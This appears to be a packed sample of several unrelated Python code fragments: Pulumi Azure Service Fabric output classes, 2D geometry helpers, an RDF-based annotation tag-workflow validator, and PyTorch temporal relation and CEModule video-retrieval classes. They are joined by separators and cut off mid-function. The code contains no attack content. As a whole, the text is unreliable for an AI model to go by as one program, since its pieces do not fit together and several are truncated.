def __key_warning(key: str):
suggest = None
if key == "defaultLoad":
suggest = "default_load"
elif key == "primaryDefaultLoad":
suggest = "primary_default_load"
elif key == "secondaryDefaultLoad":
suggest = "secondary_default_load"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceLoadMetricDescriptionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceLoadMetricDescriptionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceLoadMetricDescriptionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
default_load: Optional[int] = None,
primary_default_load: Optional[int] = None,
secondary_default_load: Optional[int] = None,
weight: Optional[str] = None):
"""
Specifies a metric to load balance a service during runtime.
:param str name: The name of the metric. If the service chooses to report load during runtime, the load metric name should match the name that is specified in Name exactly. Note that metric names are case sensitive.
:param int default_load: Used only for Stateless services. The default amount of load, as a number, that this service creates for this metric.
:param int primary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Primary replica.
:param int secondary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Secondary replica.
:param str weight: The service load metric relative weight, compared to other metrics configured for this service, as a number.
"""
pulumi.set(__self__, "name", name)
if default_load is not None:
pulumi.set(__self__, "default_load", default_load)
if primary_default_load is not None:
pulumi.set(__self__, "primary_default_load", primary_default_load)
if secondary_default_load is not None:
pulumi.set(__self__, "secondary_default_load", secondary_default_load)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the metric. If the service chooses to report load during runtime, the load metric name should match the name that is specified in Name exactly. Note that metric names are case sensitive.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="defaultLoad")
def default_load(self) -> Optional[int]:
"""
Used only for Stateless services. The default amount of load, as a number, that this service creates for this metric.
"""
return pulumi.get(self, "default_load")
@property
@pulumi.getter(name="primaryDefaultLoad")
def primary_default_load(self) -> Optional[int]:
"""
Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Primary replica.
"""
return pulumi.get(self, "primary_default_load")
@property
@pulumi.getter(name="secondaryDefaultLoad")
def secondary_default_load(self) -> Optional[int]:
"""
Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Secondary replica.
"""
return pulumi.get(self, "secondary_default_load")
@property
@pulumi.getter
def weight(self) -> Optional[str]:
"""
The service load metric relative weight, compared to other metrics configured for this service, as a number.
"""
return pulumi.get(self, "weight")
@pulumi.output_type
class ServicePlacementPolicyDescriptionResponse(dict):
"""
Describes the policy to be used for placement of a Service Fabric service.
"""
def __init__(__self__, *,
type: str):
"""
Describes the policy to be used for placement of a Service Fabric service.
:param str type: The type of placement policy for a service fabric service. Following are the possible values.
"""
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> str:
"""
The type of placement policy for a service fabric service. Following are the possible values.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class ServiceTypeDeltaHealthPolicyResponse(dict):
"""
Represents the delta health policy used to evaluate the health of services belonging to a service type when upgrading the cluster.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "maxPercentDeltaUnhealthyServices":
suggest = "max_percent_delta_unhealthy_services"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceTypeDeltaHealthPolicyResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceTypeDeltaHealthPolicyResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceTypeDeltaHealthPolicyResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
max_percent_delta_unhealthy_services: Optional[int] = None):
"""
Represents the delta health policy used to evaluate the health of services belonging to a service type when upgrading the cluster.
:param int max_percent_delta_unhealthy_services: The maximum allowed percentage of services health degradation allowed during cluster upgrades.
The delta is measured between the state of the services at the beginning of upgrade and the state of the services at the time of the health evaluation.
The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits.
"""
if max_percent_delta_unhealthy_services is None:
max_percent_delta_unhealthy_services = 0
if max_percent_delta_unhealthy_services is not None:
pulumi.set(__self__, "max_percent_delta_unhealthy_services", max_percent_delta_unhealthy_services)
@property
@pulumi.getter(name="maxPercentDeltaUnhealthyServices")
def max_percent_delta_unhealthy_services(self) -> Optional[int]:
"""
The maximum allowed percentage of services health degradation allowed during cluster upgrades.
The delta is measured between the state of the services at the beginning of upgrade and the state of the services at the time of the health evaluation.
The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits.
"""
return pulumi.get(self, "max_percent_delta_unhealthy_services")
@pulumi.output_type
class ServiceTypeHealthPolicyResponse(dict):
"""
Represents the health policy used to evaluate the health of services belonging to a service type.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "maxPercentUnhealthyServices":
suggest = "max_percent_unhealthy_services"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceTypeHealthPolicyResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceTypeHealthPolicyResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceTypeHealthPolicyResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
max_percent_unhealthy_services: Optional[int] = None):
"""
Represents the health policy used to evaluate the health of services belonging to a service type.
:param int max_percent_unhealthy_services: The maximum percentage of services allowed to be unhealthy before your application is considered in error.
"""
if max_percent_unhealthy_services is None:
max_percent_unhealthy_services = 0
if max_percent_unhealthy_services is not None:
pulumi.set(__self__, "max_percent_unhealthy_services", max_percent_unhealthy_services)
@property
@pulumi.getter(name="maxPercentUnhealthyServices")
def max_percent_unhealthy_services(self) -> Optional[int]:
"""
The maximum percentage of services allowed to be unhealthy before your application is considered in error.
"""
return pulumi.get(self, "max_percent_unhealthy_services")
@pulumi.output_type
class SettingsParameterDescriptionResponse(dict):
"""
Describes a parameter in fabric settings of the cluster.
"""
def __init__(__self__, *,
name: str,
value: str):
"""
Describes a parameter in fabric settings of the cluster.
:param str name: The parameter name of fabric setting.
:param str value: The parameter value of fabric setting.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> str:
"""
The parameter name of fabric setting.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def value(self) -> str:
"""
The parameter value of fabric setting.
"""
return pulumi.get(self, "value")
@pulumi.output_type
class SettingsSectionDescriptionResponse(dict):
"""
Describes a section in the fabric settings of the | |
<reponame>geobarry/line-simplipy
#-------------------------------------------------------------------------------
# Name: geom utils
# Purpose: various geometry functions
# License: MIT License
#-------------------------------------------------------------------------------
import data_utils as d
import math as __m
import matplotlib.pyplot as plt
from scipy.spatial import cKDTree
from decimal import Decimal as dec
def clockwise_sequence(edges):
"""
Determines a clockwise sequence of the input edges around their shared 1st vertex.
* Can handle edges that start in the same direction but then later split, but
no accomodations made for floating point errors or precision tolerance.
Parameters
----------
edges : list of lists of (x,y) tuples
List of edges. Each edge must have the same first vertex. No edge should be
identical to or a subset of another edge
Returns
-------
seq : list
Sequence of edge indices, so that result[i] represents the edge in position i.
"""
# HELPER FUNCTION
def get_subedges(tied_edges):
"""Creates a set of sub edges from split vertex, including reverse leader segment
Input edges should start from same pt and go in same direction"""
origin = tied_edges[0][0] # get shared 1st vertex
v2list = [e[1] for e in tied_edges] # get 2nd vertex of all edges
v2set = set(v2list) # find unique pts
# get closest to origin
if len(v2set) != 1:
dist_list = [distance_pts(origin,v2) for v2 in v2list]
min_id = d.min_id(dist_list)
# min_id, min_d = min(enumerate(dist_list), key=itemgetter(1))
fulcrum = v2list[min_id]
else:
fulcrum = v2list[0]
# create sub_edges by truncating
def check_subedge(e,fulcrum):
if e[0] == fulcrum:
return e
else:
return [fulcrum] + e
subedges=[check_subedge(e[1:], fulcrum) for e in tied_edges]
subedges.append([fulcrum,origin]) # add reverse leader
return subedges
# MAIN CODE
# error checking
# *** need to handle case where "edge" has only one vertex
# *** by simply placing it in any place in sequence
# pull out degenerate edges
degenerate_edge_ids = [i for i in range(len(edges)) if len(edges[i])<2]
legitimate_edge_ids = [i for i in range(len(edges)) if len(edges[i])>=2]
legitimate_edges = [edges[i] for i in legitimate_edge_ids]
# work on legitimate edges
n = len(legitimate_edge_ids)
bearings = [-1*bearing(edge[0],edge[1]) for edge in legitimate_edges]
seq,ranks = d.sequence_info(bearings)
r=0
# obtain and handle sets of ties
while r < n-1:
# get list of identical bearings
tie_ranks = [r]
while r < n-1 and bearings[seq[r+1]] == bearings[seq[r]]:
r += 1
tie_ranks.append(r)
# handle set of identical bearings
if len(tie_ranks) > 1:
# get subedges
tied_edges = [legitimate_edges[seq[r]] for r in tie_ranks]
subedges = get_subedges(tied_edges)
# get subedge order
subseq = clockwise_sequence(subedges)
lead_pos = subseq.index(len(subedges)-1)
subseq = subseq[lead_pos+1:] + subseq[:lead_pos]
# make replacements
replaces = [(tie_ranks[i],seq[tie_ranks[subseq[i]]]) for i in range(len(tie_ranks))]
for repl in replaces:
seq[repl[0]] = repl[1]
# move to next rank
r += 1
# convert to original index
seq=[legitimate_edge_ids[i] for i in seq]
# add back in degenerate edge ids
seq = seq + degenerate_edge_ids
return seq
def subtract_vectors(a,b):
"""
Computes the vector difference a-b
Parameters
----------
a : (x,y) tuple
b : (x,y) tuple
Returns
-------
(x,y) tuple
"""
return (a[0]-b[0],a[1]-b[1])
def dot_product(a,b):
"""
Computes the dot-product of two vectors.
Parameters
----------
a : (x,y) tuple
b : (x,y) tuple
Returns
-------
float
"""
return a[0]*b[0] + a[1]*b[1]
def length(v):
"""
Computes the length of a vector
Parameters
----------
v : (x,y) tuple
Returns
-------
float
"""
return __m.sqrt((v[0]**2)+(v[1]**2))
def bearing(p1,p2):
"""
Computes the direction from p1 to p2
Parameters
----------
p1 : (x,y) tuple
p2 : (x,y) tuple
Returns
-------
float
The bearing in radians counter-clockwise from horizontal-right (=0).
"""
v = subtract_vectors(p2, p1)
return __m.atan2(v[1], v[0])
def angle(fulcrum,a,b):
"""
Computes the angle from a to b, measured in radians counterclockwise.
Parameters
----------
fulcrum :: (x,y) tuple
fulcrum of angle
a :: (x,y) tuple
end of one segment from fulcrum
b :: (x,y) tuple
end of other segment from fulcrum
Returns
-------
float in range [0,pi]
"""
# uses method in https://scicomp.stackexchange.com/questions/27689/numerically-stable-way-of-computing-angles-between-vectors
# which is measured to be numerically stable to ~10^-15
# get distances of triangle formed
c=distance_pts(a,b)
a=distance_pts(fulcrum,a)
b=distance_pts(fulcrum,b)
if b<0 or c<0: # this should never happen
return None
if b >= c:
mu = c-(a-b)
else:
mu = b-(a-c)
numerator=((a-b)+c)*mu
denominator=(a+(b+c))*((a-c)+b)
half_tangent = __m.sqrt(numerator/denominator)
theta = 2 * __m.atan(half_tangent)
return theta
def angle_quick(fulcrum,a,b):
# approx. 18% faster, but errors up to 10 x e-8 occur approx. 1/million times
a=subtract_vectors(a,fulcrum)
b=subtract_vectors(b, fulcrum)
dotprod = dot_product(a, b)
a = length(a)
b = length(b)
cos_theta = dotprod/(a*b)
return __m.acos(cos_theta)
def area(pts,absolute=False):
"""
Computes the clockwise area of the polygon defined by the points.
Args:
pts: list of (x,y) tuples. Assumes last and first vertex are different.
Cannot handle if input points contain None coordinates.
absolute: if true, returns the absolute value
Returns:
float representing the area
"""
if pts[len(pts)-1] != pts[0]:
pts.append(pts[0])
a=[(pts[i+1][0]-pts[i][0])*(pts[i][1]+pts[i+1][1]) for i in range(len(pts)-1)]
A=sum(a)/2
if absolute:
return abs(A)
else:
return A
def triangle_area(a,b,c, robustZero = False):
'''returns the area of the triangle
If robustZero: returns zero if
zero is calculated in any one of three ways, or
if both negative and positive values are
calculated by the different methods'''
# reduce numbers to avoid floating point precision
minx = min(a[0],b[0],c[0])
miny = min(a[1],b[1],c[1])
a,b,c=(a[0]-minx,a[1]-miny),(b[0]-minx,b[1]-miny),(c[0]-minx,c[1]-miny)
# calculate area three different ways
a1=(b[0]-a[0])*(b[1]+a[1])
a2=(c[0]-b[0])*(c[1]+b[1])
a3=(a[0]-c[0])*(c[1]+a[1])
areas = [a1+a2+a3,a2+a3+a1,a3+a1+a2]
if robustZero:
# if any are zero, return zero
if min([abs(x) for x in areas])==0:
return 0
# if there is disagreement over sign, return zero
if (areas[0] > 0) != (areas[1] > 0):
return 0
if (areas[0] > 0) != (areas[2] > 0):
return 0
# return area with minimum absolute value
w=0
if abs(areas[1])<abs(areas[0]):
w=1
if abs(areas[2])<abs(areas[w]):
w=2
area = areas[w]
return area/2
def distance_pts(a,b):
''' computes the distance between two points.
inputs should be lists of two coordinates.'''
return __m.sqrt((b[0]-a[0])**2 + (b[1]-a[1])**2)
def cycle_next(id, cycle_length):
"""
computes the next id in a cycle
Parameters
----------
id : integer
The index of an item in the cycle.
cycle_length : integer
The length of the cycle.
Returns
-------
integer
The index of the next item in the cycle
"""
if id==cycle_length-1:
return 0
else:
return id+1
def cycle_prev(id,cycle_length):
"""
computes the previous id in a cycle
Parameters
----------
id : integer
The index of an item in the cycle.
cycle_length : integer
The length of the cycle.
Returns
-------
integer
The index of the previous item in the cycle
"""
if id==0:
return cycle_length-1
else:
return id-1
def nextID_in_poly(poly, id):
"""
Determines the id of the next point on a standard polygon.
Parameters
----------
poly :: List of (x,y) tuples
Representation of a polygon, with identical first and last vertices.
id : Integer
Returns
-------
Integer
"""
if id==len(poly)-1:
return 1
elif id== len(poly)-2:
return 0
else:
return id+1
def prevID_in_poly(poly, id):
"""
Determines the id of the previous point on a standard polygon.
Parameters
----------
poly :: List of (x,y) tuples
Representation of a polygon, with identical first and last vertices.
id : Integer
Returns
-------
Integer
"""
if id==0:
return len(poly)-2
else:
return id-1
def clockwise(A,B,C):
"""Determines if points A,B & C are sequenced clockwise around a triangle.
Args:
A,B,C: (x,y) tuples
Returns:
True if points are sequenced clockwise. Result is unpredictable if points
are collinear."""
return (C[1]-A[1])*(B[0]-A[0]) > (B[1]-A[1])*(C[0]-A[0])
def intersect(A,B,C,D):
"""Quickly determines if segment AB intersects segment CD.
Args:
A,B,C,D: (x,y) tuples
Returns:
True if segments intersect. Result is unpredictable if
lines are parallel or segments meet at endpoin.
"""
return clockwise(A,C,D) != clockwise(B,C,D) and clockwise(A,B,C) != clockwise(A,B,D)
def intersection(A,B,C,D,infinite=True):
""" Returns the intersection point of two lines AB & CD.
A,B,C,D and return value are all lists of two coordinates each.
If lines are parallel or do not intersect, returns a pair of Nones.
Code taken from <NAME>, pp. 48-9
Args:
A,B,C,D: (x,y) tuples
infinite: If False, will return (None, None)
Returns:
(x,y) tuple of coordinates of intersection point"""
## if ultra_precise:
## A=(Decimal(A[0]),Decimal(A[1])) # dec_pt(A)
## B=(Decimal(B[0]),Decimal(B[1])) # dec_pt(B)
## C=(Decimal(C[0]),Decimal(C[1])) # dec_pt(C)
## D=(Decimal(D[0]),Decimal(D[1])) # dec_pt(D)
if A[0]==B[0]:
if C[0]==D[0]:
xp,yp=None,None # lines are parallel
else: # first line vertical
b2=(D[1]-C[1])/(D[0]-C[0])
a2=C[1]-b2*C[0]
| |
')' if _tagset else '()'
_badset = ' '.join(sorted(t for t in self.badset))
badset = ' (' + _badset + ')' if _badset else ' ()'
_ontid_all_tags = ' '.join(sorted(t.curie for t in self.ontid_all_tags))
ontid_all_tags = ' (' + _ontid_all_tags + ')' if _ontid_all_tags else ' ()'
return f'{self.__class__.__name__}.byId({self.id!r}) # {tagset}{badset}{ontid_all_tags}'
class TagLogic(AnnoAsTags):
aat_dict = {}
def __init__(self, anno):
super().__init__(anno)
self.validate()
self.invalid = bool(self.reason_invalid)
self.valid = not self.invalid
def special_case(self): # FIXME wow is this bad
# handle info_tags
badset = set(OntId(t) if t.startswith('RRIDCUR:')
and ' ' not in t # *shakes fist angrily*
else t
for t in self.badset)
tagset = frozenset(badset | self.tagset - {None})
for itag in self.infotags:
if itag in tagset:
tagset = frozenset((t for t in tagset if t != itag))
self.warnings |= frozenset({itag})
for cv_tag, tag in self.cvtags.items():
if cv_tag in tagset:
tagset = tagset - frozenset((cv_tag))
tagset |= frozenset((tag))
self.warnings |= frozenset({cv_tag})
def rrid_safe_suffix(_):
hah = next(iter(self.RRIDcurator)) # FIXME multicase ...
return not hah.suffix in set(t.suffix
for t in self.anno_part_instances[OntId('workflow:tagCurator')])
scs = {
# TODO make sure that ONLY the workflow tags are used to retrieve values
# so that annotations with an RRID: tag that are/were unresolved have to
# to into a special handline pipeline FIXME this implementation is NOT sufficient
('workflow:RRID',):
(rrid_safe_suffix, ('workflow:RRID', 'RRIDCUR:Missing')),
('workflow:RRID', 'RRIDCUR:Validated'):
(lambda x:True, ('RRIDCUR:Validated',)), # rrid deal with elsewhere
('workflow:RRID', 'RRIDCUR:Unresolved'): # super confusing ...
(lambda x:True, ('RRIDCUR:GiveMeAReason',)),
('workflow:RRIDscibot', 'RRIDCUR:Unresolved'):
(lambda x:True, ('RRIDCUR:Unresolved',)),
#('workflow:RRID',): ('workflow:RRID', 'RRIDCUR:Missing'),
# can't use this yet due to the bad RRID:Missing and friends issues
#('',): ('',),
}
special_cases = {}
for special, (test, case) in scs.items():
special_cases[
frozenset((OntId(s) for s in special))
] = test, frozenset((OntId(c) for c in case))
if tagset in special_cases:
test, new_tagset = special_cases[tagset]
if test(tagset):
self.warnings |= tagset
return new_tagset
else:
return None
elif self.warnings: # itags
return tagset
def validate(self):
""" validate a single reply chain """
self.reason_invalid = tuple()
if self.badset:
badset = self.badset - self.info_tags - frozenset(self.cv_tags) # FIXME make this accessible
if badset:
self.reason_invalid += ('There are bad tags.',)
if self.tagset not in self.valid_tagsets:
special_case = self.special_case() # TODO do something with special case?
if not special_case:
self.reason_invalid += ('Invalid tagset',) # TODO post possible fixes
if self.orphaned:
self.reason_invalid += ('Orphaned',)
# the tests below usually will not trigger at this stage
# because the issue usually arrises only when looking across multiple
# reply threads, thus what we need to do is flag any reply chains that
# have been superseeded
if len(self.DOIs) > 1:
self.reason_invalid += ('Too many DOIs',)
if len(self.PMIDs) > 1:
self.reason_invalid += ('Too many PMIDs',)
if len(self.RRIDcurator) > 1:
self.reason_invalid += ('Too many curator RRIDs',)
if len(self.RRIDscibot) > 1: # only the paranoid survive
self.reason_invalid += ('Too many scibot RRIDs',)
if self.Unresolved and len(self.RRIDcurator) == 1:
curatorRRID = next(iter(self.RRIDcurator))
if curatorRRID.curie == self.putativeRRID: # putatives could break OntId, so keep as string
self.reason_invalid += ('Unresolved scibot RRID matches curator RRID',)
@property
def next_tags(self):
if self.valid:
for next_state in self.tag_transitions[self.tagset]:
yield from next_state - self.tagset
@property
def current_state(self):
if self.invalid: # modelViolated
return 'TEMP:needsQC'
else:
return 'TODO'
@property
def initiatesAction(self):
# compute wheter an action needs to be taken based on the state we are in
# NOTE this is orthogonal to terminals and endpoints
# hrm ... PDA ... HRM
if self.tagset in self.terminal_tagsets:
return self.terminal_tagsets[self.tagset]
else:
# TODO ar there states that require something elseseomthin?
pass
def write(graph, path, format='nifttl'):
with open(path, 'wb') as f:
f.write(graph.serialize(format=format))
def parse_workflow():
# FIXME TODO these states should probably be compiled down to numbers???
docs = Path(__file__).parent.absolute().resolve().parent / 'docs'
rridpath = docs / 'workflow-rrid.graphml'
paperpath = docs / 'workflow-paper-id.graphml'
cgraph = ConjunctiveGraph()
gt.WorkflowMapping(rridpath.as_posix()).graph(cgraph)
gt.PaperIdMapping(paperpath.as_posix(), False).graph(cgraph)
write(cgraph, '/tmp/workflow.ttl')
predicates = set(cgraph.predicates())
OntCuries({cp:str(ip) for cp, ip in cgraph.namespaces()})
OntCuries({'RRID': 'https://scicrunch.org/resolver/RRID:',
'DOI': 'https://doi.org/',
'PMID': 'https://www.ncbi.nlm.nih.gov/pubmed/'})
hg = makeGraph('', graph=cgraph)
short = sorted(hg.qname(_) for _ in predicates)
wf.hasTag
wf.hasReplyTag
wf.hasTagOrReplyTag
wf.hasOutputTag
#if type isa wf.tag
tag_types = set(cgraph.transitive_subjects(rdfs.subClassOf, wf.tag))
tag_tokens = {tagType:sorted(set(t for t in cgraph.transitive_subjects(rdf.type, tagType)
if t != tagType))
for tagType in tag_types}
has_tag_types = set(cgraph.transitive_subjects(rdfs.subPropertyOf, wf.hasTagOrReplyTag))
has_tag_types.add(wf.hasOutputTag)
has_next_action_types = set(cgraph.transitive_subjects(rdfs.subPropertyOf, wf.hasOutput))
has_next_action_types.add(wf.hasNextStep)
terminals = sorted(tag
for ttype in tag_types
if ttype != wf.tagScibot # scibot is not 'terminal' for this part
for tag in cgraph[:rdf.type:ttype]
if not isinstance(tag, BNode)
and not any(o for httype in has_tag_types
for o in cgraph[tag:httype]))
endpoints = sorted(endpoint
for endpoint in cgraph[:rdf.type:wf.state]
if not isinstance(endpoint, BNode)
and not any(o for hnatype in has_next_action_types
for o in cgraph[endpoint:hnatype]))
complicated = sorted(a_given_tag
for tt in tag_types
for a_given_tag in cgraph[:rdf.type:tt]
if not isinstance(a_given_tag, BNode)
and not [successor_tag
for htt in has_tag_types
for successor_tag in chain(t
for t in cgraph[a_given_tag:htt]
#if not isinstance(t, BNode)
,
# we don't actually need this for terminals
# we will need it later
#(t for b in cgraph[a_given_tag:htt]
#if isinstance(b, BNode)
#for listhead in cgraph[b:owl.oneOf]
#for t in unlist(listhead, cgraph)),
)])
def topList(node, g):
for s in g[:rdf.rest:node]:
yield s
def getLists(node, g):
for linker in g[:rdf.first:node]:
top = None
for top in g.transitiveClosure(topList, linker):
pass
if top:
yield top
else:
yield linker
def getIsTagOf(node, g):
for htt in has_tag_types:
for parent_tag in g[:htt:node]:
yield parent_tag
def getIsOneOfTagOf(node, g):
for list_top in getLists(node, g):
for linker in g[:owl.oneOf:list_top]:
for parent_tag, _ in g[::linker]:
yield parent_tag
def getPreviousTag(node, g): # not quite what we need
yield from getIsOneOfTagOf(node, g)
yield from getIsTagOf(node, g)
def getTagChains(node, g, seen=tuple()):
# seen to prevent recursion cases where
# taggning can occur in either order e.g. PMID -> DOI
#print(tc.red(repr(OntId(node)))) # tc.red(OntId(node)) does weird stuff O_o
parent_tag = None
for parent_tag in chain(getIsOneOfTagOf(node, g),
getIsTagOf(node, g)):
if parent_tag in seen:
parent_tag = None
continue
ptt = next(g[parent_tag:rdf.type])
#if ptt in tag_types:
for pchain in getTagChains(parent_tag, g, seen + (node,)):
if ptt in tag_types:
out = parent_tag, *pchain
else:
out = pchain
yield out
if not ptt and not out:
parent_tag = None
if not parent_tag:
yield tuple()
def getInitiatesAction(node, g):
for action in g[:wf.initiatesAction:node]:
yield action
def getIsOneOfOutputOf(node, g):
for list_top in getLists(node, g):
for linker in g[:owl.oneOf:list_top]:
for hot in has_next_action_types:
for parent_thing in g[:hot:linker]:
yield parent_thing
def getActionChains(node, g):
parent_action = None
for parent_action in chain(getIsOneOfOutputOf(node, g), # works for actions too
getInitiatesAction(node, g)):
for pchain in getActionChains(parent_action, g): # NOTE may also be a tag...
out = parent_action, *pchain
#print(tuple(hg.qname(o) for o in out))
yield out
if not parent_action:
yield tuple()
def getRestSubjects(predicate, object, g):
""" invert restriction """
rsco = cmb.Restriction(rdfs.subClassOf)
for rt in rsco.parse(graph=g):
if rt.p == predicate and rt.o == object:
yield from g.transitive_subjects(rdfs.subClassOf, rt.s)
annoParts = list(getRestSubjects(wf.isAttachedTo, wf.annotation, cgraph))
partInstances = {OntId(a):set(t if isinstance(t, BNode) else OntId(t)
for t in cgraph.transitive_subjects(rdf.type, a)
if not isinstance(t, BNode) and t != a)
for a in annoParts}
_endpoint_chains = {OntId(endpoint):[[OntId(endpoint)] + [OntId(e) for e in chain]
for chain in getActionChains(endpoint, cgraph)]
for endpoint in endpoints}
#print([hg.qname(e) for e in endpoints])
#print([print([hg.qname(c) for c in getActionChains(endpoint, cgraph) if c])
#for endpoint in endpoints
#if endpoint])
#_ = [print(list(getActionChains(e, cgraph)) for e in endpoints)]
#return
wat = cgraph.transitiveClosure(getPreviousTag, RRIDCUR.Duplicate)
wat = list(wat)
#def invOneOf(tag, g):
fake_chains = {hg.qname(terminal):
[hg.qname(c)
for c in cgraph.transitiveClosure(getPreviousTag, terminal)]
for terminal in terminals}
def make_chains(things, getChains):
return {OntId(thing):[[OntId(thing)] + [OntId(e) for e in chain]
for chain in getChains(thing, cgraph)]
for thing in things
#if not print(thing)
}
def print_chains(thing_chains):
print('\nstart from beginning')
print('\n'.join(sorted(' -> '.join(hg.qname(e) for e in reversed(chain))
for chains in thing_chains.values()
for chain in chains)))
print('\nstart from end')
print('\n'.join(sorted(' <- '.join(e.curie for e in chain)
for chains in thing_chains.values()
for chain in chains)))
def valid_tagsets(all_chains):
# not the most efficient way to do this ...
transitions = defaultdict(set)
for end, chains in all_chains.items():
for chain in chains:
valid = set()
prior_state = None
for element in reversed(chain):
valid.add(element)
state = frozenset(valid)
transitions[prior_state].add(state)
prior_state = state
return {s:frozenset(n) for s, n | |
Temporal Relation Network Module in use'
print(msg, ['%d-frame relation' % i for i in self.scales])
def forward(self, input):
# the first one is the largest scale
act_all = input[:, self.relations_scales[0][0] , :]
act_all = act_all.view(act_all.size(0), self.scales[0] * self.img_feature_dim)
act_all = self.fc_fusion_scales[0](act_all)
for scaleID in range(1, len(self.scales)):
# iterate over the scales
idx_relations_randomsample = np.random.choice(
len(self.relations_scales[scaleID]),
self.subsample_scales[scaleID],
replace=False,
)
for idx in idx_relations_randomsample:
act_relation = input[:, self.relations_scales[scaleID][idx], :]
act_relation = act_relation.view(act_relation.size(0), self.scales[scaleID] * self.img_feature_dim)
act_relation = self.fc_fusion_scales[scaleID](act_relation)
act_all += act_relation
return act_all
def return_relationset(self, num_frames, num_frames_relation):
import itertools
return list(itertools.combinations([i for i in range(num_frames)], num_frames_relation))
class RelationModuleMultiScale_Cat(th.nn.Module):
# Temporal Relation module in multiply scale, suming over [2-frame relation, 3-frame relation, ..., n-frame relation]
def __init__(self, img_feature_dim, num_frames, num_class):
super(RelationModuleMultiScale_Cat, self).__init__()
self.subsample_num = 3 # how many relations selected to sum up
self.img_feature_dim = img_feature_dim
self.scales = [i for i in range(num_frames, 1, -1)] # generate the multiple frame relations
self.relations_scales = []
self.subsample_scales = []
for scale in self.scales:
relations_scale = self.return_relationset(num_frames, scale)
self.relations_scales.append(relations_scale)
self.subsample_scales.append(min(self.subsample_num, len(relations_scale))) # how many samples of relation to select in each forward pass
self.num_class = num_class
self.num_frames = num_frames
num_bottleneck = 256
self.fc_fusion_scales = nn.ModuleList() # high-tech modulelist
for i in range(len(self.scales)):
scale = self.scales[i]
fc_fusion = nn.Sequential(
nn.ReLU(),
nn.Linear(scale * self.img_feature_dim, num_bottleneck),
nn.ReLU(),
nn.Linear(num_bottleneck, self.num_class),
)
self.fc_fusion_scales += [fc_fusion]
print('Multi-Scale Temporal Relation Network Module in use', ['%d-frame relation' % i for i in self.scales])
def forward(self, input):
record = []
# the first one is the largest scale
act_all = input[:, self.relations_scales[0][0] , :]
act_all = act_all.view(act_all.size(0), self.scales[0] * self.img_feature_dim)
act_all = self.fc_fusion_scales[0](act_all)
norm = act_all.norm(p=2, dim=-1, keepdim=True)
act_all = act_all.div(norm)
record.append(act_all)
for scaleID in range(1, len(self.scales)):
# iterate over the scales
idx_relations_randomsample = np.random.choice(len(self.relations_scales[scaleID]), self.subsample_scales[scaleID], replace=False)
act_all = 0
for idx in idx_relations_randomsample:
act_relation = input[:, self.relations_scales[scaleID][idx], :]
act_relation = act_relation.view(act_relation.size(0), self.scales[scaleID] * self.img_feature_dim)
act_relation = self.fc_fusion_scales[scaleID](act_relation)
act_all += act_relation
norm = act_all.norm(p=2, dim=-1, keepdim=True)
act_all = act_all.div(norm)
record.append(act_all)
act_all = th.cat((record), 1)
return act_all
def return_relationset(self, num_frames, num_frames_relation):
import itertools
return list(itertools.combinations([i for i in range(num_frames)],
num_frames_relation))
class CEModule(nn.Module):
def __init__(self, expert_dims, text_dim, use_ce, verbose, l2renorm, num_classes,
trn_config, trn_cat, use_mish, include_self, num_h_layers, num_g_layers,
disable_nan_checks, random_feats, test_caption_mode, mimic_ce_dims,
concat_experts, concat_mix_experts, freeze_weights, task,
keep_missing_modalities, vlad_feat_sizes, same_dim, use_bn_reason):
super().__init__()
modalities = list(expert_dims.keys())
self.expert_dims = expert_dims
self.modalities = modalities
self.disable_nan_checks = disable_nan_checks
self.mimic_ce_dims = mimic_ce_dims
self.concat_experts = concat_experts
self.same_dim = same_dim
self.use_mish = use_mish
self.use_bn_reason = use_bn_reason
self.num_h_layers = num_h_layers
self.num_g_layers = num_g_layers
self.include_self = include_self
self.num_classes = num_classes
self.task = task
self.vlad_feat_sizes = vlad_feat_sizes
self.concat_mix_experts = concat_mix_experts
self.test_caption_mode = test_caption_mode
self.reduce_dim = 64
self.moe_cg = ContextGating
self.freeze_weights = freeze_weights
self.random_feats = random_feats
self.use_ce = use_ce
self.verbose = verbose
self.keep_missing_modalities = keep_missing_modalities
self.l2renorm = l2renorm
self.trn_config = trn_config
self.trn_cat = trn_cat
print("trn_config is {}".format(self.trn_config))
if self.use_mish:
self.non_lin = Mish()
else:
self.non_lin = nn.ReLU()
if "retrieval" in self.task:
num_mods = len(expert_dims)
self.moe_fc = nn.Linear(text_dim, len(expert_dims))
# self.moe_fc_bottleneck1 = nn.Linear(text_dim, text_dim // 4)
# self.moe_cg = nn.Linear(text_dim // 4, text_dim // 4)
# self.moe_fc_proj = nn.Linear(text_dim // 4, len(expert_dims))
self.moe_weights = th.ones(1, num_mods) / num_mods
# The batch size of the face input can vary (due to missing inputs), so we
# probably shouldn't use BN on this branch. It's probably fine to leave it
